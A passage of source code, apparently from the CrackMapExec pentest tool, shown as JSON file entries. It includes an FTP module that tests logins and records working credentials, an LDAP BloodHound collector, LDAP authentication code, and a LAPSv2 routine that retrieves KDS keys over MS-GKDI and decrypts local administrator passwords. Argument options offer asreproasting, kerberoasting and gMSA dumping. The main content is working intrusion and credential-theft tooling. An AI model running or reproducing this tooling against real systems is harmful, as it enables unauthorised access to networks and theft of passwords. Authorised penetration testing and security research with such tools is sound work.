database, if not add it in.\n \"\"\"\n credentials = []\n\n q = select(self.CredentialsTable).filter(\n func.lower(self.CredentialsTable.c.username) == func.lower(username),\n func.lower(self.CredentialsTable.c.password) == func.lower(password)\n )\n results = self.sess.execute(q).all()\n\n # add new credential\n if not results:\n new_cred = {\n \"username\": username,\n \"password\": password,\n }\n credentials = [new_cred]\n # update existing cred data\n else:\n for creds in results:\n # this will include the id, so we don't touch it\n cred_data = creds._asdict()\n # only update column if it is being passed in\n if username is not None:\n cred_data[\"username\"] = username\n if password is not None:\n cred_data[\"password\"] = password\n # only add cred to be updated if it has changed\n if cred_data not in credentials:\n credentials.append(cred_data)\n\n # TODO: find a way to abstract this away to a single Upsert call\n q_users = Insert(self.CredentialsTable) # .returning(self.CredentialsTable.c.id)\n update_columns_users = {col.name: col for col in q_users.excluded if col.name not in \"id\"}\n q_users = q_users.on_conflict_do_update(\n index_elements=self.CredentialsTable.primary_key,\n set_=update_columns_users\n )\n cme_logger.debug(f\"Adding credentials: {credentials}\")\n\n self.sess.execute(q_users, credentials) # .scalar()\n # return cred_ids\n\n # hacky way to get cred_id since we can't use returning() yet\n if len(credentials) == 1:\n cred_id = self.get_credential(username, password)\n return cred_id\n else:\n return credentials\n\n def remove_credentials(self, creds_id):\n \"\"\"\n Removes a credential ID from the database\n \"\"\"\n del_hosts = []\n for cred_id in creds_id:\n q = delete(self.CredentialsTable).filter(self.CredentialsTable.c.id == cred_id)\n del_hosts.append(q)\n self.sess.execute(q)\n\n def is_credential_valid(self, credential_id):\n \"\"\"\n Check if this credential ID is valid.\n \"\"\"\n q = select(self.CredentialsTable).filter(\n self.CredentialsTable.c.id == credential_id,\n self.CredentialsTable.c.password is not None,\n )\n results = self.sess.execute(q).all()\n return len(results) > 0\n\n def get_credential(self, username, password):\n q = select(self.CredentialsTable).filter(\n self.CredentialsTable.c.username == username,\n self.CredentialsTable.c.password == password,\n )\n results = self.sess.execute(q).first()\n if results is None:\n return None\n else:\n return results.id\n\n def get_credentials(self, filter_term=None):\n \"\"\"\n Return credentials from the database.\n \"\"\"\n # if we're returning a single credential by ID\n if self.is_credential_valid(filter_term):\n q = select(self.CredentialsTable).filter(self.CredentialsTable.c.id == filter_term)\n # if we're filtering by username\n elif filter_term and filter_term != \"\":\n like_term = func.lower(f\"%{filter_term}%\")\n q = select(self.CredentialsTable).filter(func.lower(self.CredentialsTable.c.username).like(like_term))\n # otherwise return all credentials\n else:\n q = select(self.CredentialsTable)\n\n results = self.sess.execute(q).all()\n return results\n\n def is_host_valid(self, host_id):\n \"\"\"\n Check if this host ID is valid.\n \"\"\"\n q = select(self.HostsTable).filter(self.HostsTable.c.id == host_id)\n results = self.sess.execute(q).all()\n return len(results) > 0\n\n def get_hosts(self, filter_term=None):\n \"\"\"\n Return hosts from the database.\n \"\"\"\n q = select(self.HostsTable)\n\n # if we're returning a single host by ID\n if self.is_host_valid(filter_term):\n q = q.filter(self.HostsTable.c.id == filter_term)\n results = self.sess.execute(q).first()\n # all() returns a list, so we keep the return format the same so consumers don't have to guess\n return [results]\n # if we're filtering by host\n elif filter_term and filter_term != \"\":\n like_term = func.lower(f\"%{filter_term}%\")\n q = q.filter(self.HostsTable.c.host.like(like_term))\n results = self.sess.execute(q).all()\n cme_logger.debug(f\"FTP get_hosts() - results: {results}\")\n return results\n\n def is_user_valid(self, cred_id):\n \"\"\"\n Check if this User ID is valid.\n \"\"\"\n q = select(self.CredentialsTable).filter(self.CredentialsTable.c.id == cred_id)\n results = self.sess.execute(q).all()\n return len(results) > 0\n\n def get_user(self, username):\n q = select(self.CredentialsTable).filter(func.lower(self.CredentialsTable.c.username) == func.lower(username))\n results = self.sess.execute(q).all()\n return results\n\n def get_users(self, filter_term=None):\n q = select(self.CredentialsTable)\n\n if self.is_user_valid(filter_term):\n q = q.filter(self.CredentialsTable.c.id == filter_term)\n # if we're filtering by username\n elif filter_term and filter_term != \"\":\n like_term = func.lower(f\"%{filter_term}%\")\n q = q.filter(func.lower(self.CredentialsTable.c.username).like(like_term))\n results = self.sess.execute(q).all()\n return results\n\n def add_loggedin_relation(self, cred_id, host_id):\n relation_query = select(self.LoggedinRelationsTable).filter(\n self.LoggedinRelationsTable.c.credid == cred_id,\n self.LoggedinRelationsTable.c.hostid == host_id,\n )\n results = self.sess.execute(relation_query).all()\n\n # only add one if one doesn't already exist\n if not results:\n relation = {\n \"credid\": cred_id,\n \"hostid\": host_id\n }\n try:\n cme_logger.debug(f\"Inserting loggedin_relations: {relation}\")\n # TODO: find a way to abstract this away to a single Upsert call\n q = Insert(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id)\n\n self.sess.execute(q, [relation]) # .scalar()\n inserted_id_results = self.get_loggedin_relations(cred_id, host_id)\n cme_logger.debug(f\"Checking if relation was added: {inserted_id_results}\")\n return inserted_id_results[0].id\n except Exception as e:\n cme_logger.debug(f\"Error inserting LoggedinRelation: {e}\")\n\n def get_loggedin_relations(self, cred_id=None, host_id=None):\n q = select(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id)\n if cred_id:\n q = q.filter(self.LoggedinRelationsTable.c.credid == cred_id)\n if host_id:\n q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)\n results = self.sess.execute(q).all()\n return results\n\n def remove_loggedin_relations(self, cred_id=None, host_id=None):\n q = delete(self.LoggedinRelationsTable)\n if cred_id:\n q = q.filter(self.LoggedinRelationsTable.c.credid == cred_id)\n elif host_id:\n q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)\n self.sess.execute(q)\n\n def add_directory_listing(self, lir_id, data):\n pass\n\n def get_directory_listing(self):\n pass\n\n def remove_directory_listing(self):\n pass\n" }, { "path": "cme/protocols/ftp/db_navigator.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_table, print_help\n\n\nclass navigator(DatabaseNavigator):\n def display_creds(self, creds):\n data = [[\n \"CredID\",\n \"Total Logins\",\n \"Username\",\n \"Password\",\n ]]\n\n for cred in creds:\n total_users = self.db.get_loggedin_relations(cred_id=cred[0])\n data.append([\n cred[0],\n str(len(total_users)) + \" Host(s)\",\n cred[1],\n cred[2],\n ])\n print_table(data, title=\"Credentials\")\n\n def display_hosts(self, hosts):\n data = [[\n \"HostID\",\n \"Total Users\",\n \"Host\",\n \"Port\",\n \"Banner\",\n ]]\n\n for h in hosts:\n total_users = self.db.get_loggedin_relations(host_id=h[0])\n data.append([\n h[0],\n str(len(total_users)) + \" User(s)\",\n h[1],\n h[2],\n h[3],\n ])\n print_table(data, title=\"Hosts\")\n\n def do_hosts(self, line):\n filter_term = line.strip()\n\n if filter_term == \"\":\n hosts = self.db.get_hosts()\n self.display_hosts(hosts)\n else:\n hosts = self.db.get_hosts(filter_term=filter_term)\n\n if len(hosts) > 1:\n self.display_hosts(hosts)\n elif len(hosts) == 1:\n data = [[\n \"HostID\",\n \"Host\",\n \"Port\",\n \"Banner\"\n ]]\n host_id_list = [h[0] for h in hosts]\n\n for h in hosts:\n data.append([h[0], h[1], h[2], h[3], h[4]])\n\n print_table(data, title=\"Host\")\n\n login_data = [[\n \"CredID\",\n \"UserName\",\n \"Password\"\n ]]\n for host_id in host_id_list:\n login_links = self.db.get_loggedin_relations(host_id=host_id)\n\n for link in login_links:\n link_id, cred_id, host_id = link\n creds = self.db.get_credentials(filter_term=cred_id)\n for cred in creds:\n cred_data = [cred[0], cred[1], cred[2]]\n if cred_data not in login_data:\n login_data.append(cred_data)\n\n if len(login_data) > 1:\n print_table(login_data, title=\"Credential(s) with Logins\",)\n\n @staticmethod\n def help_hosts(self):\n help_string = \"\"\"\n hosts [filter_term]\n By default prints all hosts\n Table format:\n | 'HostID', 'Host', 'Port', 'Banner' |\n \"\"\"\n print_help(help_string)\n\n def do_creds(self, line):\n filter_term = line.strip()\n\n if filter_term == \"\":\n creds = self.db.get_credentials()\n self.display_creds(creds)\n elif filter_term.split()[0].lower() == \"add\":\n # add format: \"username password\"\n args = filter_term.split()[1:]\n\n if len(args) == 2:\n username, password = args\n self.db.add_credential(username, password)\n else:\n print(\"[!] Format is 'add username password\")\n return\n elif filter_term.split()[0].lower() == \"remove\":\n args = filter_term.split()[1:]\n if len(args) != 1:\n print(\"[!] Format is 'remove '\")\n return\n else:\n self.db.remove_credentials(args)\n self.db.remove_admin_relation(user_ids=args)\n else:\n creds = self.db.get_credentials(filter_term=filter_term)\n if len(creds) != 1:\n self.display_creds(creds)\n elif len(creds) == 1:\n cred_data = [[\"CredID\", \"UserName\", \"Password\"]]\n cred_id_list = []\n\n for cred in creds:\n cred_id = cred[0]\n cred_id_list.append(cred_id)\n username = cred[1]\n password = cred[2]\n\n cred_data.append([cred_id, username, password])\n print_table(cred_data, title=\"Credential(s)\")\n\n access_data = [[\"HostID\", \"Host\", \"Port\", \"Banner\"]]\n\n for cred_id in cred_id_list:\n logins = self.db.get_loggedin_relations(cred_id=cred_id)\n\n for link in logins:\n link_id, cred_id, host_id = link\n hosts = self.db.get_hosts(host_id)\n for h in hosts:\n access_data.append([h[0], h[1], h[2], h[3]])\n\n # we look if it's greater than one because the header row always exists\n if len(access_data) > 1:\n print_table(access_data, title=\"Access to Host(s)\")\n\n def help_creds(self):\n help_string = \"\"\"\n creds [add|remove|filter_term]\n By default prints all creds\n Table format:\n | 'CredID', 'Login To', 'UserName', 'Password' |\n Subcommands:\n add - format: \"add username password \"\n remove - format: \"remove \"\n filter_term - filters creds with filter_term\n If a single credential is returned (e.g. `creds 15`, it prints the following tables:\n Credential(s) | 'CredID', 'UserName', 'Password' |\n Access to Host(s) | 'HostID', 'Host', 'OS', 'Banner'\n Otherwise, it prints the default credential table from a `like` query on the `username` column\n \"\"\"\n print_help(help_string)\n\n def do_clear_database(self, line):\n if input(\"This will destroy all data in the current database, are you SURE you want to run this? (y/n): \") == \"y\":\n self.db.clear_database()\n\n @staticmethod\n def help_clear_database(self):\n help_string = \"\"\"\n clear_database\n THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE\n YOU CANNOT UNDO THIS COMMAND\n \"\"\"\n print_help(help_string)\n" }, { "path": "cme/protocols/ftp/proto_args.py", "content": "def proto_args(parser, std_parser, module_parser):\n ftp_parser = parser.add_parser(\"ftp\", help=\"own stuff using FTP\", parents=[std_parser, module_parser])\n ftp_parser.add_argument(\"--port\", type=int, default=21, help=\"FTP port (default: 21)\")\n\n cgroup = ftp_parser.add_argument_group(\"FTP Access\", \"Options for enumerating your access\")\n cgroup.add_argument(\"--ls\", action=\"store_true\", help=\"List files in the directory\")\n return parser\n" }, { "path": "cme/protocols/ftp.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom cme.config import process_secret\nfrom cme.connection import *\nfrom cme.logger import CMEAdapter\nfrom ftplib import FTP, error_reply, error_temp, error_perm, error_proto\n\n\nclass ftp(connection):\n def __init__(self, args, db, host):\n self.protocol = \"FTP\"\n self.remote_version = None\n\n super().__init__(args, db, host)\n\n def proto_logger(self):\n self.logger = CMEAdapter(\n extra={\n \"protocol\": \"FTP\",\n \"host\": self.host,\n \"port\": self.args.port,\n \"hostname\": self.hostname,\n }\n )\n\n def proto_flow(self):\n self.proto_logger()\n if self.create_conn_obj():\n if self.enum_host_info():\n if self.print_host_info():\n if self.login():\n pass\n\n def enum_host_info(self):\n welcome = self.conn.getwelcome()\n self.logger.debug(f\"Welcome result: {welcome}\")\n self.remote_version = welcome.split(\"220\", 1)[1].strip() # strip out the extra space in the front\n self.logger.debug(f\"Remote version: {self.remote_version}\")\n return True\n\n def print_host_info(self):\n self.logger.display(f\"Banner: {self.remote_version}\")\n return True\n\n def create_conn_obj(self):\n self.conn = FTP()\n try:\n self.conn.connect(host=self.host, port=self.args.port)\n except error_reply:\n return False\n except error_temp:\n return False\n except error_perm:\n return False\n except error_proto:\n return False\n except socket.error:\n return False\n return True\n\n def plaintext_login(self, username, password):\n if not self.conn.sock:\n self.create_conn_obj()\n try:\n self.logger.debug(self.conn.sock)\n resp = self.conn.login(user=username, passwd=password)\n self.logger.debug(f\"Response: {resp}\")\n except Exception as e:\n self.logger.fail(f\"{username}:{process_secret(password)} (Response:{e})\")\n self.conn.close()\n return False\n\n # 230 is \"User logged in, proceed\" response, ftplib raises an exception on failed login\n if \"230\" in resp:\n self.logger.debug(f\"Host: {self.host} Port: {self.args.port}\")\n self.db.add_host(self.host, self.args.port, self.remote_version)\n\n cred_id = self.db.add_credential(username, password)\n\n host_id = self.db.get_hosts(self.host)[0].id\n self.db.add_loggedin_relation(cred_id, host_id)\n\n if username in [\"anonymous\", \"\"] and password in [\"\", \"-\"]:\n self.logger.success(f\"{username}:{process_secret(password)} {highlight('- Anonymous Login!')}\")\n else:\n self.logger.success(f\"{username}:{process_secret(password)}\")\n\n if self.args.ls:\n files = self.list_directory_full()\n self.logger.display(f\"Directory Listing\")\n for file in files:\n self.logger.highlight(file)\n\n if not self.args.continue_on_success:\n self.conn.close()\n return True\n self.conn.close()\n\n\n def list_directory_full(self):\n # in the future we can use mlsd/nlst if we want, but this gives a full output like `ls -la`\n # ftplib's \"dir\" prints directly to stdout, and \"nlst\" only returns the folder name, not full details\n files = []\n self.conn.retrlines(\"LIST\", callback=files.append)\n return files\n\n def supported_commands(self):\n raw_supported_commands = self.conn.sendcmd(\"HELP\")\n supported_commands = [item for sublist in (x.split() for x in raw_supported_commands.split(\"\\n\")[1:-1]) for item in sublist]\n self.logger.debug(f\"Supported commands: {supported_commands}\")\n return supported_commands\n" }, { "path": "cme/protocols/ldap/__init__.py", "content": "" }, { "path": "cme/protocols/ldap/bloodhound.py", "content": "import sys, time\n\nfrom cme.logger import CMEAdapter\nfrom bloodhound.ad.domain import ADDC\nfrom bloodhound.enumeration.computers import ComputerEnumerator\nfrom bloodhound.enumeration.memberships import MembershipEnumerator\nfrom bloodhound.enumeration.domains import DomainEnumerator\n\n\nclass BloodHound(object):\n def __init__(self, ad, hostname, host, port):\n self.ad = ad\n self.ldap = None\n self.pdc = None\n self.sessions = []\n self.hostname = hostname\n self.dc = hostname\n self.proto_logger(port, hostname, host)\n\n def proto_logger(self, port, hostname, host):\n self.logger = CMEAdapter(extra={\"protocol\": \"LDAP\", \"host\": host, \"port\": port, \"hostname\": hostname})\n\n def connect(self):\n if len(self.ad.dcs()) == 0:\n self.logger.fail(\"Could not find a domain controller. Consider specifying a domain and/or DNS server.\")\n sys.exit(1)\n\n if not self.ad.baseDN:\n self.logger.fail(\"Could not figure out the domain to query. Please specify this manually with -d\")\n sys.exit(1)\n\n pdc = self.ad.dcs()[0]\n self.logger.debug(\"Using LDAP server: %s\", pdc)\n self.logger.debug(\"Using base DN: %s\", self.ad.baseDN)\n\n if len(self.ad.kdcs()) > 0:\n kdc = self.ad.kdcs()[0]\n self.logger.debug(\"Using kerberos KDC: %s\", kdc)\n self.logger.debug(\"Using kerberos realm: %s\", self.ad.realm())\n\n # Create a domain controller object\n self.pdc = ADDC(pdc, self.ad)\n # Create an object resolver\n self.ad.create_objectresolver(self.pdc)\n\n # self.pdc.ldap_connect(self.ad.auth.username, self.ad.auth.password, kdc)\n\n def run(\n self,\n collect,\n num_workers=10,\n disable_pooling=False,\n timestamp=\"\",\n computerfile=\"\",\n cachefile=None,\n exclude_dcs=False,\n ):\n start_time = time.time()\n if cachefile:\n self.ad.load_cachefile(cachefile)\n\n # Check early if we should enumerate computers as well\n do_computer_enum = any(\n method in collect\n for method in [\n \"localadmin\",\n \"session\",\n \"loggedon\",\n \"experimental\",\n \"rdp\",\n \"dcom\",\n \"psremote\",\n ]\n )\n\n if \"group\" in collect or \"objectprops\" in collect or \"acl\" in collect:\n # Fetch domains for later, computers if needed\n self.pdc.prefetch_info(\n \"objectprops\" in collect,\n \"acl\" in collect,\n cache_computers=do_computer_enum,\n )\n # Initialize enumerator\n membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling)\n membership_enum.enumerate_memberships(timestamp=timestamp)\n elif \"container\" in collect:\n # Fetch domains for later, computers if needed\n self.pdc.prefetch_info(\n \"objectprops\" in collect,\n \"acl\" in collect,\n cache_computers=do_computer_enum,\n )\n # Initialize enumerator\n membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling)\n membership_enum.do_container_collection(timestamp=timestamp)\n elif do_computer_enum:\n # We need to know which computers to query regardless\n # We also need the domains to have a mapping from NETBIOS -> FQDN for local admins\n self.pdc.prefetch_info(\"objectprops\" in collect, \"acl\" in collect, cache_computers=True)\n elif \"trusts\" in collect:\n # Prefetch domains\n self.pdc.get_domains(\"acl\" in collect)\n if \"trusts\" in collect or \"acl\" in collect or \"objectprops\" in collect:\n trusts_enum = DomainEnumerator(self.ad, self.pdc)\n trusts_enum.dump_domain(collect, timestamp=timestamp)\n if do_computer_enum:\n # If we don't have a GC server, don't use it for deconflictation\n have_gc = len(self.ad.gcs()) > 0\n computer_enum = ComputerEnumerator(\n self.ad,\n self.pdc,\n collect,\n do_gc_lookup=have_gc,\n computerfile=computerfile,\n exclude_dcs=exclude_dcs,\n )\n computer_enum.enumerate_computers(self.ad.computers, num_workers=num_workers, timestamp=timestamp)\n end_time = time.time()\n minutes, seconds = divmod(int(end_time - start_time), 60)\n self.logger.highlight(\"Done in %02dM %02dS\" % (minutes, seconds))\n" }, { "path": "cme/protocols/ldap/database.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom sqlalchemy import MetaData, Table\nfrom sqlalchemy.exc import (\n IllegalStateChangeError,\n NoInspectionAvailable,\n NoSuchTableError,\n)\nfrom cme.logger import cme_logger\n\n\nclass database:\n def __init__(self, db_engine):\n self.CredentialsTable = None\n self.HostsTable = None\n\n self.db_engine = db_engine\n self.db_path = self.db_engine.url.database\n self.protocol = Path(self.db_path).stem.upper()\n self.metadata = MetaData()\n self.reflect_tables()\n session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)\n\n Session = scoped_session(session_factory)\n # this is still named \"conn\" when it is the session object; TODO: rename\n self.conn = Session()\n\n @staticmethod\n def db_schema(db_conn):\n db_conn.execute(\n \"\"\"CREATE TABLE \"credentials\" (\n \"id\" integer PRIMARY KEY,\n \"username\" text,\n \"password\" text\n )\"\"\"\n )\n\n db_conn.execute(\n \"\"\"CREATE TABLE \"hosts\" (\n \"id\" integer PRIMARY KEY,\n \"ip\" text,\n \"hostname\" text,\n \"port\" integer\n )\"\"\"\n )\n\n def reflect_tables(self):\n with self.db_engine.connect() as conn:\n try:\n self.CredentialsTable = Table(\"credentials\", self.metadata, autoload_with=self.db_engine)\n self.HostsTable = Table(\"hosts\", self.metadata, autoload_with=self.db_engine)\n except (NoInspectionAvailable, NoSuchTableError):\n print(\n f\"\"\"\n [-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch\n [-] This is probably because a newer version of CME is being ran on an old DB schema\n [-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)\n [-] Then remove the CME {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB\"\"\"\n )\n exit()\n\n def shutdown_db(self):\n try:\n self.conn.close()\n # due to the async nature of CME, sometimes session state is a bit messy and this will throw:\n # Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and\n # this would cause an unexpected state change to \n except IllegalStateChangeError as e:\n cme_logger.debug(f\"Error while closing session db object: {e}\")\n\n def clear_database(self):\n for table in self.metadata.sorted_tables:\n self.conn.execute(table.delete())\n" }, { "path": "cme/protocols/ldap/db_navigator.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_help\n\n\nclass navigator(DatabaseNavigator):\n def do_clear_database(self, line):\n if input(\"This will destroy all data in the current database, are you SURE you want to run this? (y/n): \") == \"y\":\n self.db.clear_database()\n\n def help_clear_database(self):\n help_string = \"\"\"\n clear_database\n THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE\n YOU CANNOT UNDO THIS COMMAND\n \"\"\"\n print_help(help_string)\n" }, { "path": "cme/protocols/ldap/gmsa.py", "content": "from impacket.structure import Structure\n\n\nclass MSDS_MANAGEDPASSWORD_BLOB(Structure):\n structure = (\n (\"Version\", \"= 0:\n # We need to try SSL\n try:\n ldapConnection = ldap_impacket.LDAPConnection(f\"ldaps://{kdcHost}\", baseDN)\n ldapConnection.login(\n username,\n password,\n domain,\n lmhash,\n nthash,\n aesKey,\n kdcHost=kdcHost,\n useCache=False,\n )\n self.logger.extra[\"protocol\"] = \"LDAPS\"\n self.logger.extra[\"port\"] = \"636\"\n # self.logger.success(out)\n return ldapConnection\n except ldap_impacket.LDAPSessionError as e:\n errorCode = str(e).split()[-2][:-1]\n self.logger.fail(\n f\"{domain}\\\\{username}:{password if password else ntlm_hash} {ldap_error_status[errorCode] if errorCode in ldap_error_status else ''}\",\n color=\"magenta\" if errorCode in ldap_error_status else \"red\",\n )\n else:\n errorCode = str(e).split()[-2][:-1]\n self.logger.fail(\n f\"{domain}\\\\{username}:{password if password else ntlm_hash} {ldap_error_status[errorCode] if errorCode in ldap_error_status else ''}\",\n color=\"magenta\" if errorCode in ldap_error_status else \"red\",\n )\n return False\n\n except OSError as e:\n self.logger.debug(f\"{domain}\\\\{username}:{password if password else ntlm_hash} {'Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller'}\")\n return False\n except KerberosError as e:\n self.logger.fail(\n f\"{domain}\\\\{username}:{password if password else ntlm_hash} {str(e)}\",\n color=\"red\",\n )\n return False\n\n def auth_login(self, domain, username, password, ntlm_hash):\n lmhash = \"\"\n nthash = \"\"\n\n # This checks to see if we didn't provide the LM Hash\n if ntlm_hash and ntlm_hash.find(\":\") != -1:\n lmhash, nthash = ntlm_hash.split(\":\")\n elif ntlm_hash:\n nthash = ntlm_hash\n\n # Create the baseDN\n baseDN = \"\"\n domainParts = domain.split(\".\")\n for i in domainParts:\n baseDN += f\"dc={i},\"\n # Remove last ','\n baseDN = baseDN[:-1]\n\n try:\n ldapConnection = ldap_impacket.LDAPConnection(f\"ldap://{domain}\", baseDN, domain)\n ldapConnection.login(username, password, domain, lmhash, nthash)\n\n # Connect to LDAP\n out = \"{domain}\\\\{username}:{password if password else ntlm_hash}\"\n self.logger.extra[\"protocol\"] = \"LDAP\"\n self.logger.extra[\"port\"] = \"389\"\n # self.logger.success(out)\n\n return ldapConnection\n\n except ldap_impacket.LDAPSessionError as e:\n if str(e).find(\"strongerAuthRequired\") >= 0:\n # We need to try SSL\n try:\n ldapConnection = ldap_impacket.LDAPConnection(f\"ldaps://{domain}\", baseDN, domain)\n ldapConnection.login(username, password, domain, lmhash, nthash)\n self.logger.extra[\"protocol\"] = \"LDAPS\"\n self.logger.extra[\"port\"] = \"636\"\n # self.logger.success(out)\n return ldapConnection\n except ldap_impacket.LDAPSessionError as e:\n errorCode = str(e).split()[-2][:-1]\n self.logger.fail(\n f\"{domain}\\\\{username}:{password if password else ntlm_hash} {ldap_error_status[errorCode] if errorCode in ldap_error_status else ''}\",\n color=\"magenta\" if errorCode in ldap_error_status else \"red\",\n )\n else:\n errorCode = str(e).split()[-2][:-1]\n self.logger.fail(\n f\"{domain}\\\\{username}:{password if password else ntlm_hash} {ldap_error_status[errorCode] if errorCode in ldap_error_status else ''}\",\n color=\"magenta\" if errorCode in ldap_error_status else \"red\",\n )\n return False\n\n except OSError as e:\n self.logger.debug(f\"{domain}\\\\{username}:{password if password else ntlm_hash} {'Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller'}\")\n return False\n\nclass LAPSv2Extract:\n def __init__(self, data, username, password, domain, ntlm_hash, do_kerberos, kdcHost, port):\n if ntlm_hash.find(\":\") != -1:\n self.lmhash, self.nthash = ntlm_hash.split(\":\")\n else:\n self.nthash = ntlm_hash\n self.lmhash = ''\n\n self.data = data\n self.username = username\n self.password = password\n self.domain = domain\n self.do_kerberos = do_kerberos\n self.kdcHost = kdcHost\n self.logger = None\n self.proto_logger(self.domain, port, self.domain)\n\n def proto_logger(self, host, port, hostname):\n self.logger = CMEAdapter(extra={\"protocol\": \"LDAP\", \"host\": host, \"port\": port, \"hostname\": hostname})\n\n def run(self):\n KDSCache = {}\n self.logger.info('[-] Unpacking blob')\n try:\n encryptedLAPSBlob = EncryptedPasswordBlob(self.data)\n parsed_cms_data, remaining = decoder.decode(encryptedLAPSBlob['Blob'], asn1Spec=rfc5652.ContentInfo())\n enveloped_data_blob = parsed_cms_data['content']\n parsed_enveloped_data, _ = decoder.decode(enveloped_data_blob, asn1Spec=rfc5652.EnvelopedData())\n\n recipient_infos = parsed_enveloped_data['recipientInfos']\n kek_recipient_info = recipient_infos[0]['kekri']\n kek_identifier = kek_recipient_info['kekid']\n key_id = KeyIdentifier(bytes(kek_identifier['keyIdentifier']))\n tmp,_ = decoder.decode(kek_identifier['other']['keyAttr'])\n sid = tmp['field-1'][0][0][1].asOctets().decode(\"utf-8\")\n target_sd = create_sd(sid)\n except Exception as e:\n logging.error('Cannot unpack msLAPS-EncryptedPassword blob due to error %s' % str(e))\n return\n\n # Check if item is in cache\n if key_id['RootKeyId'] in KDSCache:\n self.logger.info(\"Got KDS from cache\")\n gke = KDSCache[key_id['RootKeyId']]\n else:\n # Connect on RPC over TCP to MS-GKDI to call opnum 0 GetKey\n stringBinding = hept_map(destHost=self.domain, remoteIf=MSRPC_UUID_GKDI, protocol='ncacn_ip_tcp')\n rpctransport = transport.DCERPCTransportFactory(stringBinding)\n if hasattr(rpctransport, 'set_credentials'):\n rpctransport.set_credentials(username=self.username, password=self.password, domain=self.domain, lmhash=self.lmhash, nthash=self.nthash)\n if self.do_kerberos:\n self.logger.info(\"Connecting using kerberos\")\n rpctransport.set_kerberos(self.do_kerberos, kdcHost=self.kdcHost)\n\n dce = rpctransport.get_dce_rpc()\n dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)\n dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n self.logger.info(\"Connecting to %s\" % stringBinding)\n try:\n dce.connect()\n except Exception as e:\n logging.error(\"Something went wrong, check error status => %s\" % str(e))\n return False\n self.logger.info(\"Connected\")\n try:\n dce.bind(MSRPC_UUID_GKDI)\n except Exception as e:\n logging.error(\"Something went wrong, check error status => %s\" % str(e))\n return False\n self.logger.info(\"Successfully bound\")\n\n\n self.logger.info(\"Calling MS-GKDI GetKey\")\n resp = GkdiGetKey(dce, target_sd=target_sd, l0=key_id['L0Index'], l1=key_id['L1Index'], l2=key_id['L2Index'], root_key_id=key_id['RootKeyId'])\n self.logger.info(\"Decrypting password\")\n # Unpack GroupKeyEnvelope\n gke = GroupKeyEnvelope(b''.join(resp['pbbOut']))\n KDSCache[gke['RootKeyId']] = gke\n\n kek = compute_kek(gke, key_id)\n self.logger.info(\"KEK:\\t%s\" % kek)\n enc_content_parameter = bytes(parsed_enveloped_data[\"encryptedContentInfo\"][\"contentEncryptionAlgorithm\"][\"parameters\"])\n iv, _ = decoder.decode(enc_content_parameter)\n iv = bytes(iv[0])\n\n cek = unwrap_cek(kek, bytes(kek_recipient_info['encryptedKey']))\n self.logger.info(\"CEK:\\t%s\" % cek)\n plaintext = decrypt_plaintext(cek, iv, remaining)\n self.logger.info(plaintext[:-18].decode('utf-16le'))\n return plaintext[:-18].decode('utf-16le')" }, { "path": "cme/protocols/ldap/proto_args.py", "content": "from argparse import _StoreTrueAction\n\ndef proto_args(parser, std_parser, module_parser):\n ldap_parser = parser.add_parser('ldap', help=\"own stuff using LDAP\", parents=[std_parser, module_parser])\n ldap_parser.add_argument(\"-H\", '--hash', metavar=\"HASH\", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')\n ldap_parser.add_argument(\"--port\", type=int, choices={389, 636}, default=389, help=\"LDAP port (default: 389)\")\n no_smb_arg = ldap_parser.add_argument(\"--no-smb\", action=get_conditional_action(_StoreTrueAction), make_required=[], help='No smb connection')\n\n dgroup = ldap_parser.add_mutually_exclusive_group()\n domain_arg = dgroup.add_argument(\"-d\", metavar=\"DOMAIN\", dest='domain', type=str, default=None, help=\"domain to authenticate to\")\n dgroup.add_argument(\"--local-auth\", action='store_true', help='authenticate locally to each target')\n no_smb_arg.make_required = [domain_arg]\n\n egroup = ldap_parser.add_argument_group(\"Retrevie hash on the remote DC\", \"Options to get hashes from Kerberos\")\n egroup.add_argument(\"--asreproast\", help=\"Get AS_REP response ready to crack with hashcat\")\n egroup.add_argument(\"--kerberoasting\", help='Get TGS ticket ready to crack with hashcat')\n\n vgroup = ldap_parser.add_argument_group(\"Retrieve useful information on the domain\", \"Options to to play with Kerberos\")\n vgroup.add_argument(\"--trusted-for-delegation\", action=\"store_true\", help=\"Get the list of users and computers with flag TRUSTED_FOR_DELEGATION\")\n vgroup.add_argument(\"--password-not-required\", action=\"store_true\", help=\"Get the list of users with flag PASSWD_NOTREQD\")\n vgroup.add_argument(\"--admin-count\", action=\"store_true\", help=\"Get objets that had the value adminCount=1\")\n vgroup.add_argument(\"--users\", action=\"store_true\", help=\"Enumerate enabled domain users\")\n vgroup.add_argument(\"--groups\", action=\"store_true\", help=\"Enumerate domain groups\")\n vgroup.add_argument(\"--dc-list\", action=\"store_true\", help=\"Enumerate Domain Controllers\")\n vgroup.add_argument(\"--get-sid\", action=\"store_true\", help=\"Get domain sid\")\n\n ggroup = ldap_parser.add_argument_group(\"Retrevie gmsa on the remote DC\", \"Options to play with gmsa\")\n ggroup.add_argument(\"--gmsa\", action=\"store_true\", help=\"Enumerate GMSA 